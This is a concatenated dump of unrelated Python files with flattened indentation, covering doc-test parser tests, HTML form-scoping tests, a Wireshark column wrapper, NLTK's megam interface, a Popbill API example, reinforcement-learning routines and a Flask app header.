# a test manuel
CLASS = re.compile(r'^\s+:class:',re.MULTILINE)
class Block(object):
def __init__(self,source): self.source = source
def find_class_blocks(document):
for region in document.find_regions(CLASS):
region.parsed = Block(region.source)
document.claim_region(region)
def Test():
return Manuel(parsers=[find_class_blocks])
# now our test
d = Document("""
.. topic:: something-else
:class: not-a-file
line 1
line 2
line 3
""")
d.parse_with(Files('td')+Test())
# now check FileBlock didn't mask class block
compare([
None,
C(Block,
source=' :class:\n'),
None,
],[r.parsed for r in d])
def test_evaluate_non_fileblock(self):
m = Mock()
d = TestContainer('parsed',m)
d.evaluate_with(Files('td'),globs={})
compare([None],[r.evaluated for r in d])
compare(m.call_args_list,[])
compare(m.method_calls,[])
def test_evaluate_read_same(self):
dir = TempDirectory()
dir.write('foo', b'content')
d = TestContainer('parsed',FileBlock('foo','content','read'))
d.evaluate_with(Files('td'),globs={'td':dir})
compare([C(FileResult,
passed=True,
expected=None,
actual=None)],
[r.evaluated for r in d])
def test_evaluate_read_difference(self):
dir = TempDirectory()
dir.write('foo', b'actual')
d = TestContainer('parsed',FileBlock('foo','expected','read'))
d.evaluate_with(Files('td'),globs={'td':dir})
compare([C(FileResult,
passed=False,
path='foo',
expected='expected',
actual='actual')],
[r.evaluated for r in d])
def test_evaulate_write(self):
dir = TempDirectory()
d = TestContainer('parsed',FileBlock('foo','content','write'))
d.evaluate_with(Files('td'),globs={'td':dir})
compare([C(FileResult,
passed=True,
expected=None,
actual=None)],
[r.evaluated for r in d])
dir.check('foo')
compare(dir.read('foo', 'ascii'), 'content')
def test_formatter_non_fileblock(self):
d = TestContainer('evaluated',object)
d.format_with(Files('td'))
compare(d.formatted(),'')
def test_formatter_passed(self):
d = TestContainer('evaluated',FileResult())
d.format_with(Files('td'))
compare(d.formatted(),'')
def test_formatter_failed(self):
r = FileResult()
r.passed = False
r.path = '/foo/bar'
r.expected = 'same\nexpected\n'
r.actual = 'same\nactual\n'
d = TestContainer('evaluated',r)
d.format_with(Files('td'))
compare('File "<memory>", line 0:\n'
'Reading from "/foo/bar":\n'
'@@ -1,3 +1,3 @@\n'
' same\n'
'-expected\n'
'+actual\n ',
d.formatted()
)
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © 2016, Continuum Analytics, Inc. All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# ----------------------------------------------------------------------------
from conda_kapsel.internal.plugin_html import cleanup_and_scope_form, html_tag
import pytest
def test_html_tag():
assert "<div></div>" == html_tag("div", "")
assert "<li>foo</li>" == html_tag("li", "foo")
assert "<div><&></div>" == html_tag("div", "<&>")
def test_cleanup_and_scope_form_requires_form_tag():
original = """
<div>
<input type="text" name="foo"/>
</div>
"""
with pytest.raises(ValueError) as excinfo:
cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
assert "does not have a root <form>" in repr(excinfo.value)
def test_cleanup_and_scope_form_complains_about_missing_name(capsys):
original = """
<form>
<input type="text"/>
</form>
"""
cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
out, err = capsys.readouterr()
assert err == "No 'name' attribute set on <input type=\"text\"/>\n"
assert out == ""
def test_cleanup_and_scope_form_text_input():
original = """
<form>
<input type="text" name="foo"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<input name="prefix.foo" type="text" value="bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_multiple_text_inputs():
original = """
<form>
<input type="text" name="foo"/>
<input type="text" name="bar" value="wrong"/>
<input type="text" name="baz" value=""/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo=1, bar=2, baz=3))
expected = """
<div>
<input name="prefix.foo" type="text" value="1"/>
<input name="prefix.bar" type="text" value="2"/>
<input name="prefix.baz" type="text" value="3"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_missing_value():
original = """
<form>
<input type="text" name="foo"/>
</form>
"""
# we don't pass in a value for "foo", so the value attribute
# should be omitted
cleaned = cleanup_and_scope_form(original, "prefix.", dict())
expected = """
<div>
<input name="prefix.foo" type="text"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_textarea():
original = """
<form>
<textarea name="foo"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<textarea name="prefix.foo">bar</textarea>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_checkbox_not_checked():
original = """
<form>
<input type="checkbox" name="foo" value="not_bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<input name="prefix.foo" type="checkbox" value="not_bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_checkbox_checked():
original = """
<form>
<input type="checkbox" name="foo" value="bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<input checked="" name="prefix.foo" type="checkbox" value="bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_checkbox_checked_bool_value():
original = """
<form>
<input type="checkbox" name="foo" value="bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo=True))
expected = """
<div>
<input checked="" name="prefix.foo" type="checkbox" value="bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_radio():
original = """
<form>
<input type="radio" name="foo" value="1"/>
<input type="radio" name="foo" value="2" checked/>
<input type="radio" name="foo" value="3"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="1"))
expected = """
<div>
<input checked="" name="prefix.foo" type="radio" value="1"/>
<input name="prefix.foo" type="radio" value="2"/>
<input name="prefix.foo" type="radio" value="3"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_select_using_value_attribute():
original = """
<form>
<select name="foo">
<option value="1">One</option>
<option value="2" selected>Two</option>
<option value="3">Three</option>
</select>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="1"))
expected = """
<div>
<select name="prefix.foo">
<option selected="" value="1">One</option>
<option value="2">Two</option>
<option value="3">Three</option>
</select>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_select_using_element_text():
original = """
<form>
<select name="foo">
<option>1</option>
<option selected>2</option>
<option>3</option>
</select>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="1"))
expected = """
<div>
<select name="prefix.foo">
<option selected="">1</option>
<option>2</option>
<option>3</option>
</select>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_leave_hidden_alone():
original = """
<form>
<input type="hidden" name="foo" value="bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="blah"))
# we should NOT set the value on a hidden
expected = """
<div>
<input name="prefix.foo" type="hidden" value="bar"/>
</div>
""".strip()
assert expected == cleaned
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts PNG files from the working directory into a HDF5 volume.
Usage:
./png_to_h5.py output_filename.h5
"""
import glob
import sys
import h5py
import numpy as np
from scipy import misc
assert len(sys.argv) >= 2
png_files = glob.glob('*.png')
png_files.sort()
images = [misc.imread(i) for i in png_files]
images = np.array(images)
with h5py.File(sys.argv[1], 'w') as f:
f.create_dataset('raw', data=images, compression='gzip')
|
'''Wireshark displays generic information about a packet's content in it's GUI
using a set of columns. Each column has one of several pre-defined column-types
which ``libwireshark`` knows about and fills with content while dissecting a
packets. This allows dissectors of all kinds to provide information about a
packet, no matter where in the protocol this information is ultimately
retrieved from.
For example, :py:attr:`Type.PROTOCOL` provides the name of the deepest protocol
found within a frame; a raw ethernet frame may provide "eth" for PROTOCOL, a IP
packet within the ethernet packet overrules this to "ip", a TCP packet within
the IP-packet again overrules to 'tcp' and a HTTP packet within the TCP packet
finally overrules to 'http'.
.. note::
Wireshark uses columns in concert with it's preferences, the API reading
column-settings directly from the global preferences object. To make this
concept more flexible, we avoid this binding.
'''
from .wireshark import iface, mod
from . import dfilter
from .cdata import (CDataObject, Attribute, BooleanAttribute, StringAttribute,
InstanceAttribute, IntListAttribute, StringListAttribute,
InstanceListAttribute)
class ColumnError(Exception):
'''Base class for all column-related errors.'''
pass
class InvalidColumnType(ColumnError):
'''An invalid column-type was provided.'''
pass
class Type(object):
'''A column-type.''' # TODO
_802IQ_VLAN_ID = mod.COL_8021Q_VLAN_ID #: 802.1Q vlan ID
ABS_DATE_TIME = mod.COL_ABS_DATE_TIME #: Absolute date and time
ABS_TIME = mod.COL_ABS_TIME #: Absolute time
CIRCUIT_ID = mod.COL_CIRCUIT_ID #: Circuit ID
DSTIDX = mod.COL_DSTIDX
#: !! DEPRECATED !! - Dst port idx - Cisco MDS-specific
SRCIDX = mod.COL_SRCIDX
#: !! DEPRECATED !! - Src port idx - Cisco MDS-specific
VSAN = mod.COL_VSAN #: VSAN - Cisco MDS-specific
CUMULATIVE_BYTES = mod.COL_CUMULATIVE_BYTES #: Cumulative number of bytes
CUSTOM = mod.COL_CUSTOM #: Custom column (any filter name's contents)
DCE_CALL = mod.COL_DCE_CALL
#: DCE/RPC connection orientated call id OR datagram sequence number
DCE_CTX = mod.COL_DCE_CTX
#: !! DEPRECATED !! - DCE/RPC connection oriented context id
DELTA_TIME = mod.COL_DELTA_TIME #: Delta time
DELTA_CONV_TIME = mod.COL_DELTA_CONV_TIME
#: Delta time to last frame in conversation
REST_DST = mod.COL_RES_DST #: Resolved destination
UNRES_DST = mod.COL_UNRES_DST #: Unresolved destination
REST_DST_PORT = mod.COL_RES_DST_PORT #: Resolved destination port
UNRES_DST_PORT = mod.COL_UNRES_DST_PORT #: Unresolved destination port
DEF_DST = mod.COL_DEF_DST #: Destination address
DEF_DST_PORT = mod.COL_DEF_DST_PORT #: Destination port
EXPERT = mod.COL_EXPERT #: Expert info
IF_DIR = mod.COL_IF_DIR #: FW-1 monitor interface/direction
OXID = mod.COL_OXID #: !! DEPRECATED !! - Fibre Channel OXID
RXID = mod.COL_RXID #: !! DEPRECATED !! - Fibre Channel RXID
FR_DLCI = mod.COL_FR_DLCI #: !! DEPRECATED !! - Frame Relay DLCI
FREQ_CHAN = mod.COL_FREQ_CHAN #: IEEE 802.11 (and WiMax?) - Channel
BSSGP_TLLI = mod.COL_BSSGP_TLLI #: !! DEPRECATED !! - GPRS BSSGP IE TLLI
HPUX_DEVID = mod.COL_HPUX_DEVID
#: !! DEPRECATED !! - HP-UX Nettl Device ID
HPUX_SUBSYS = mod.COL_HPUX_SUBSYS
#: !! DEPRECATED !! - HP-UX Nettl Subsystem
DEF_DL_DST = mod.COL_DEF_DL_DST #: Data link layer destination address
DEF_DL_SRC = mod.COL_DEF_DL_SRC #: Data link layer source address
RES_DL_DST = mod.COL_RES_DL_DST #: Unresolved DL destination
UNRES_DL_DST = mod.COL_UNRES_DL_DST #: Unresolved DL destination
RES_DL_SRC = mod.COL_RES_DL_SRC #: Resolved DL source
UNRES_DL_SRC = mod.COL_UNRES_DL_SRC #: Unresolved DL source
RSSI = mod.COL_RSSI #: IEEE 802.11 - received signal strength
TX_RATE = mod.COL_TX_RATE #: IEEE 802.11 - TX rate in Mbps
DSCP_VALUE = mod.COL_DSCP_VALUE #: IP DSCP Value
INFO = mod.COL_INFO #: Description
COS_VALUE = mod.COL_COS_VALUE #: !! DEPRECATED !! - L2 COS Value
RES_NET_DST = mod.COL_RES_NET_DST #: Resolved net destination
UNRES_NET_DST = mod.COL_UNRES_NET_DST #: Unresolved net destination
RES_NET_SRC = mod.COL_RES_NET_SRC #: Resolved net source
UNRES_NET_SRC = mod.COL_UNRES_NET_SRC #: Unresolved net source
DEF_NET_DST = mod.COL_DEF_NET_DST #: Network layer destination address
DEF_NET_SRC = mod.COL_DEF_NET_SRC #: Network layer source address
NUMBER = mod.COL_NUMBER #: Packet list item number
PACKET_LENGTH = mod.COL_PACKET_LENGTH #: Packet length in bytes
PROTOCOL = mod.COL_PROTOCOL #: Protocol
REL_TIME = mod.COL_REL_TIME #: Relative time
REL_CONV_TIME = mod.COL_REL_CONV_TIME #: blurp
DEF_SRC = mod.COL_DEF_SRC #: Source address
DEF_SRC_PORT = mod.COL_DEF_SRC_PORT #: Source port
RES_SRC = mod.COL_RES_SRC #: Resolved source
UNRES_SRC = mod.COL_UNRES_SRC #: Unresolved source
RES_SRC_PORT = mod.COL_RES_SRC_PORT #: Resolved source port
UNRES_SRC_PORT = mod.COL_UNRES_SRC_PORT #: Unresolved source Port
TEI = mod.COL_TEI #: Q.921 TEI
UTC_DATE_TIME = mod.COL_UTC_DATE_TIME #: UTC date and time
UTC_TIME = mod.COL_UTC_TIME #: UTC time
CLS_TIME = mod.COL_CLS_TIME
#: Command line specific time (default relative)
NUM_COL_FMTS = mod.NUM_COL_FMTS
MAX_INFO_LEN = mod.COL_MAX_INFO_LEN
MAX_LEN = mod.COL_MAX_LEN
def __init__(self, fmt):
'''Get a reference to specific column-type.
:param fmt:
One of the defined column-types, e.g. :py:attr:`Number`
'''
if fmt not in range(self.NUM_COL_FMTS):
raise InvalidColumnType(fmt)
self.fmt = fmt
def __repr__(self):
r = '<Type description="%s" format="%s">' % (self.format_desc,
self.format_string)
return r
def __int__(self):
return self.fmt
def __eq__(self, other):
return int(other) == int(self)
def __hash__(self):
return hash(self.fmt)
@classmethod
def from_string(cls, format_string):
fmt = mod.get_column_format_from_str(format_string.encode())
if fmt == -1:
raise InvalidColumnType(format_string)
return cls(fmt)
@classmethod
def iter_column_formats(cls):
'''Iterate over all available column formats.
:returns:
An iterator that yields instances of :py:class:`Type`.
'''
for fmt in range(cls.NUM_COL_FMTS):
yield cls(fmt)
@property
def format_desc(self):
return iface.string(mod.col_format_desc(self.fmt))
@property
def format_string(self):
return iface.string(mod.col_format_to_string(self.fmt))
@property
def MAX_BUFFER_LEN(self):
if self.fmt == self.INFO:
return self.MAX_INFO_LEN
else:
return self.MAX_LEN
class Format(CDataObject):
'''A fmt_data'''
_struct = 'fmt_data'
title = StringAttribute(doc='Title of the column.')
type_ = InstanceAttribute(Type, structmember='fmt',
doc=('The column\'s type, one of '
':py:class:`Type`.'))
custom_field = StringAttribute(doc='Field-name for custom columns.')
custom_occurrence = Attribute(doc=('Optional ordinal of occcurrence '
'of the custom field.'))
visible = BooleanAttribute(doc=('True if the column should be '
'hidden in GUI.'))
resolved = BooleanAttribute(doc=('True to show a more human-'
'readable name.'))
def __init__(self, type_=None, init=None, title=None, custom_field=None,
custom_occurrence=None, visible=None, resolved=None):
'''
param init:
The underlying fmt_data-object to wrap or None to create a new one.
'''
self.cdata = init if init is not None else iface.new('fmt_data*')
if title is not None:
self.title = title
if type_ is not None:
self.type_ = type_
if custom_field is not None:
self.custom_field = custom_field
if custom_occurrence is not None:
self.custom_occurrence = custom_occurrence
if visible is not None:
self.visible = visible
if resolved is not None:
self.resolved = resolved
def __repr__(self):
return '<Format title="%s" type_="%s">' % (self.title, self.type_)
class ColumnInfo(CDataObject):
_struct = 'column_info'
num_cols = Attribute()
fmts = IntListAttribute('num_cols', 'col_fmt')
firsts = IntListAttribute(Type.NUM_COL_FMTS, 'col_first')
lasts = IntListAttribute(Type.NUM_COL_FMTS, 'col_last')
titles = StringListAttribute('num_cols', 'col_title')
custom_fields = StringListAttribute('num_cols', 'col_custom_field')
custom_occurrences = IntListAttribute('num_cols', 'col_custom_occurrence')
custom_field_ids = IntListAttribute('num_cols', 'col_custom_field_id')
custom_dfilters = InstanceListAttribute(dfilter.DisplayFilter,
sizeattr='num_cols',
structmember='col_custom_dfilter')
fences = IntListAttribute('num_cols', 'col_fence')
writeable = BooleanAttribute()
def __init__(self, init):
'''Create a new ColumnInfo-descriptor.
:param init:
Either a cdata-object to be wrapped or an iterable of
:py:class:`Format` instances.
'''
if isinstance(init, iface.CData):
self.cdata = init
else:
self.cdata = iface.new('column_info*')
self.num_cols = len(init)
self.firsts = [-1 for i in range(Type.NUM_COL_FMTS)]
self.lasts = [-1 for i in range(Type.NUM_COL_FMTS)]
self.fmts = [fmt.type_ for fmt in init]
self.titles = [fmt.title for fmt in init]
self.custom_fields = [fmt.custom_field if fmt.type_ == Type.CUSTOM
else None for fmt in init]
self.custom_occurrences = [fmt.custom_occurrence
if fmt.type_ == Type.CUSTOM else 0
for fmt in init]
self.custom_field_ids = [-1 for fmt in init]
self.custom_dfilters = [dfilter.DisplayFilter(fmt.custom_field)
if fmt.type_ == Type.CUSTOM else None
for fmt in init]
self.fences = [0 for fmt in init]
self._matx = []
for i in range(self.num_cols):
self._matx.append(iface.new('gboolean[]', Type.NUM_COL_FMTS))
self._matxp = iface.new('gboolean*[]', self._matx)
self.cdata.fmt_matx = self._matxp
for i in range(self.num_cols):
mod.get_column_format_matches(self.cdata.fmt_matx[i],
self.fmts[i])
self._col_data = [iface.NULL for fmt in init]
self._col_datap = iface.new('gchar*[]', self._col_data)
self.cdata.col_data = self._col_datap
self._col_buf = [iface.new('gchar[]', fmt.type_.MAX_BUFFER_LEN)
for fmt in init]
self._col_bufp = iface.new('gchar*[]', self._col_buf)
self.cdata.col_buf = self._col_bufp
self._col_expr = [iface.new('gchar[]', Type.MAX_LEN)
for fmt in init] + [iface.NULL]
self._col_exprp = iface.new('gchar*[]', self._col_expr)
self.cdata.col_expr.col_expr = self._col_exprp
self._col_expr_val = [iface.new('gchar[]', Type.MAX_LEN)
for fmt in init] + [iface.NULL]
self._col_expr_valp = iface.new('gchar*[]', self._col_expr_val)
self.cdata.col_expr.col_expr_val = self._col_expr_valp
for i in range(self.num_cols):
for j in range(Type.NUM_COL_FMTS):
if self._matxp[i][j]:
if self.firsts[j] == -1:
self.firsts[j] = i
self.lasts[j] = i
def __len__(self):
'''Equal to the number of columns in this descriptor'''
return self.num_cols
@property
def have_custom_cols(self):
''''''
# TODO do we really need this through the API ?
return bool(mod.have_custom_cols(self.cdata))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Jean Gabes, [email protected]
# Hartmut Goebel, [email protected]
# Grégory Starck, [email protected]
# Zoran Zaric, [email protected]
# Sebastien Coavoux, [email protected]
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from alignak_test import *
class TestConfig(AlignakTest):
def setUp(self):
self.setup_with_file('etc/alignak_resultmodulation.cfg')
def get_svc(self):
return self.sched.services.find_srv_by_name_and_hostname("test_host_0", "test_ok_0")
def get_host(self):
return self.sched.hosts.find_by_name("test_host_0")
def get_router(self):
return self.sched.hosts.find_by_name("test_router_0")
def test_service_resultmodulation(self):
svc = self.get_svc()
host = self.get_host()
router = self.get_router()
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],])
self.assertEqual('UP', host.state)
self.assertEqual('HARD', host.state_type)
# This service got a result modulation. So Criticals are in fact
# Warnings. So even with some CRITICAL (2), it must be warning
self.assertEqual('WARNING', svc.state)
# If we remove the resultmodulations, we should have theclassic behavior
svc.resultmodulations = []
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('CRITICAL', svc.state)
# Now look for the inheritaed thing
# resultmodulation is a inplicit inherited parameter
# and router define it, but not test_router_0/test_ok_0. So this service should also be impacted
svc2 = self.sched.services.find_srv_by_name_and_hostname("test_router_0", "test_ok_0")
self.assertEqual(router.resultmodulations, svc2.resultmodulations)
self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('WARNING', svc2.state)
if __name__ == '__main__':
unittest.main()
|
# Natural Language Toolkit: Interface to Megam Classifier
#
# Copyright (C) 2001-2010 NLTK Project
# Author: Edward Loper <[email protected]>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $
"""
A set of functions used to interface with the external U{megam
<http://www.cs.utah.edu/~hal/megam/>} maxent optimization package.
Before C{megam} can be used, you should tell NLTK where it can find
the C{megam} binary, using the L{config_megam()} function. Typical
usage:
>>> import nltk
>>> nltk.config_megam('.../path/to/megam')
>>> classifier = nltk.MaxentClassifier.train(corpus, 'megam')
"""
__docformat__ = 'epytext en'
import os
import os.path
import subprocess
from nltk.internals import find_binary
try:
import numpy
except ImportError:
numpy = None
######################################################################
#{ Configuration
######################################################################
_megam_bin = None
def config_megam(bin=None):
"""
Configure NLTK's interface to the C{megam} maxent optimization
package.
@param bin: The full path to the C{megam} binary. If not specified,
then nltk will search the system for a C{megam} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
"""
global _megam_bin
_megam_bin = find_binary(
'megam', bin,
env_vars=['MEGAM', 'MEGAMHOME'],
binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'],
url='http://www.cs.utah.edu/~hal/megam/')
######################################################################
#{ Megam Interface Functions
######################################################################
def write_megam_file(train_toks, encoding, stream,
bernoulli=True, explicit=True):
"""
Generate an input file for C{megam} based on the given corpus of
classified tokens.
@type train_toks: C{list} of C{tuples} of (C{dict}, C{str})
@param train_toks: Training data, represented as a list of
pairs, the first member of which is a feature dictionary,
and the second of which is a classification label.
@type encoding: L{MaxentFeatureEncodingI}
@param encoding: A feature encoding, used to convert featuresets
into feature vectors.
@type stream: C{stream}
@param stream: The stream to which the megam input file should be
written.
@param bernoulli: If true, then use the 'bernoulli' format. I.e.,
all joint features have binary values, and are listed iff they
are true. Otherwise, list feature values explicitly. If
C{bernoulli=False}, then you must call C{megam} with the
C{-fvals} option.
@param explicit: If true, then use the 'explicit' format. I.e.,
list the features that would fire for any of the possible
labels, for each token. If C{explicit=True}, then you must
call C{megam} with the C{-explicit} option.
"""
# Look up the set of labels.
labels = encoding.labels()
labelnum = dict([(label, i) for (i, label) in enumerate(labels)])
# Write the file, which contains one line per instance.
for featureset, label in train_toks:
# First, the instance number.
stream.write('%d' % labelnum[label])
# For implicit file formats, just list the features that fire
# for this instance's actual label.
if not explicit:
_write_megam_features(encoding.encode(featureset, label),
stream, bernoulli)
# For explicit formats, list the features that would fire for
# any of the possible labels.
else:
for l in labels:
stream.write(' #')
_write_megam_features(encoding.encode(featureset, l),
stream, bernoulli)
# End of the isntance.
stream.write('\n')
def parse_megam_weights(s, features_count, explicit=True):
"""
Given the stdout output generated by C{megam} when training a
model, return a C{numpy} array containing the corresponding weight
vector. This function does not currently handle bias features.
"""
if numpy is None:
raise ValueError('This function requires that numpy be installed')
assert explicit, 'non-explicit not supported yet'
lines = s.strip().split('\n')
weights = numpy.zeros(features_count, 'd')
for line in lines:
if line.strip():
fid, weight = line.split()
weights[int(fid)] = float(weight)
return weights
def _write_megam_features(vector, stream, bernoulli):
if not vector:
raise ValueError('MEGAM classifier requires the use of an '
'always-on feature.')
for (fid, fval) in vector:
if bernoulli:
if fval == 1:
stream.write(' %s' % fid)
elif fval != 0:
raise ValueError('If bernoulli=True, then all'
'features must be binary.')
else:
stream.write(' %s %s' % (fid, fval))
def call_megam(args):
"""
Call the C{megam} binary with the given arguments.
"""
if isinstance(args, basestring):
raise TypeError('args should be a list of strings')
if _megam_bin is None:
config_megam()
# Call megam via a subprocess
cmd = [_megam_bin] + args
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print
print stderr
raise OSError('megam command failed!')
return stdout
|
# -*- coding: utf-8 -*-
# code for console Encoding difference. Dont' mind on it
import sys
import imp
imp.reload(sys)
try:
sys.setdefaultencoding('UTF8')
except Exception as E:
pass
import testValue
from popbill import ClosedownService, PopbillException
closedownService = ClosedownService(testValue.LinkID, testValue.SecretKey)
closedownService.IsTest = testValue.IsTest
closedownService.IPRestrictOnOff = testValue.IPRestrictOnOff
closedownService.UseStaticIP = testValue.UseStaticIP
closedownService.UseLocalTimeYN = testValue.UseLocalTimeYN
'''
팝빌 연동회원 포인트 충전 URL을 반환합니다.
- 보안정책에 따라 반환된 URL은 30초의 유효시간을 갖습니다.
- https://docs.popbill.com/closedown/python/api#GetChargeURL
'''
try:
print("=" * 15 + " 팝빌 연동회원 포인트 충전 팝업 URL 확인 " + "=" * 15)
# 팝빌회원 사업자번호
CorpNum = testValue.testCorpNum
# 팝빌회원 아이디
UserID = testValue.testUserID
url = closedownService.getChargeURL(CorpNum, UserID)
print("URL: %s" % url)
except PopbillException as PE:
print("Exception Occur : [%d] %s" % (PE.code, PE.message))
|
import numpy as np
import MDP
class RL:
def __init__(self,mdp,sampleReward):
'''Constructor for the RL class
Inputs:
mdp -- Markov decision process (T, R, discount)
sampleReward -- Function to sample rewards (e.g., bernoulli, Gaussian).
This function takes one argument: the mean of the distributon and
returns a sample from the distribution.
'''
self.mdp = mdp
self.sampleReward = sampleReward
def sampleRewardAndNextState(self,state,action):
'''Procedure to sample a reward and the next state
reward ~ Pr(r)
nextState ~ Pr(s'|s,a)
Inputs:
state -- current state
action -- action to be executed
Outputs:
reward -- sampled reward
nextState -- sampled next state
'''
reward = self.sampleReward(self.mdp.R[action,state])
cumProb = np.cumsum(self.mdp.T[action,state,:])
nextState = np.where(cumProb >= np.random.rand(1))[0][0]
return [reward,nextState]
def qLearning(self,s0,initialQ,nEpisodes,nSteps,epsilon=0,temperature=0):
'''qLearning algorithm. Epsilon exploration and Boltzmann exploration
are combined in one procedure by sampling a random action with
probabilty epsilon and performing Boltzmann exploration otherwise.
When epsilon and temperature are set to 0, there is no exploration.
Inputs:
s0 -- initial state
initialQ -- initial Q function (|A|x|S| array)
nEpisodes -- # of episodes (one episode consists of a trajectory of nSteps that starts in s0
nSteps -- # of steps per episode
epsilon -- probability with which an action is chosen at random
temperature -- parameter that regulates Boltzmann exploration
Outputs:
Q -- final Q function (|A|x|S| array)
policy -- final policy
'''
Q = initialQ
cumActProb = np.cumsum(np.ones(self.mdp.nActions)/self.mdp.nActions)
sFreq = np.zeros(self.mdp.nStates)
for episId in xrange(nEpisodes):
state = s0
for iterId in xrange(nSteps):
sFreq[state] += 1
alpha = 1/sFreq[state]
# choose action
if epsilon > np.random.rand(1):
action = np.where(cumActProb >= np.random.rand(1))[0][0]
else:
if temperature == 0:
action = Q[:,state].argmax(0)
else:
boltzmannVal = exp(Q[:,state]/temperature)
boltzmannProb = boltzmannVal / boltzmannVal.sum()
cumBoltzmannProb = np.cumsum(boltzmannProb)
action = np.where(cumBoltzmannProb >= np.random.rand(1))[0][0]
# sample reward and next state
[reward,nextState]=self.sampleRewardAndNextState(state,action)
# update Q value
Q[action,state] += alpha * (reward + self.mdp.discount * Q[:,nextState].max() - Q[action,state])
state = nextState
policy = Q.argmax(0)
return [Q,policy]
def modelBasedActiveRL(self,s0,defaultT,initialR,nEpisodes,nSteps,epsilon=0):
'''Model-based Active Reinforcement Learning with epsilon greedy
exploration
Inputs:
s0 -- initial state
defaultT -- default transition function when a state-action pair has not been vsited
initialR -- initial estimate of the reward function
nEpisodes -- # of episodes (one episode consists of a trajectory of nSteps that starts in s0
nSteps -- # of steps per episode
epsilon -- probability with which an action is chosen at random
Outputs:
V -- final value function
policy -- final policy
'''
cumActProb = np.cumsum(np.ones(self.mdp.nActions)/self.mdp.nActions)
freq = np.zeros([self.mdp.nActions,self.mdp.nStates,self.mdp.nStates])
T = defaultT
R = initialR
model = MDP.MDP(T,R,self.mdp.discount)
[policy,V,_] = model.policyIteration(np.zeros(model.nStates,int))
for episId in xrange(nEpisodes):
state = s0
for iterId in xrange(nSteps):
# choose action
if epsilon > np.random.rand(1):
action = np.where(cumActProb >= np.random.rand(1))[0][0]
else:
action = policy[state]
# sample reward and next state
[reward,nextState]=self.sampleRewardAndNextState(state,action)
# update counts
freq[action,state,nextState] += 1
asFreq = freq[action,state,:].sum()
# update transition
T[action,state,:] = freq[action,state,:]/asFreq
# update reward
R[action,state] = (reward + (asFreq-1)*R[action,state])/asFreq
# update policy
[policy,V,_] = model.policyIteration(policy)
state = nextState
return [V,policy]
|
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
from flask import Flask
from remixvr.extensions import bcrypt, cache, db, migrate, jwt, cors
from remixvr import (commands, user, profile, project, theme, field,
space, activity, activitytype, classroom, school, submission)
